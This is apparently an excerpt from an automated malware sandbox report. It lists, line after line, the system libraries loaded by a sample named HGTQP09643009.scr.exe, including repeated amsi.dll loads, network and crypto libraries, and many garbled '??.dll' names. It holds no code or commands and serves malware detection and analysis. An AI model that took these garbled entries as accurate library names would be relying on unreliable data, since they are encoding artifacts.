Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: archiveint.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???y.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???y.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???y.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???2.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??????s?s.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??????s.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Section loaded: ??.dll	Jump to behavior
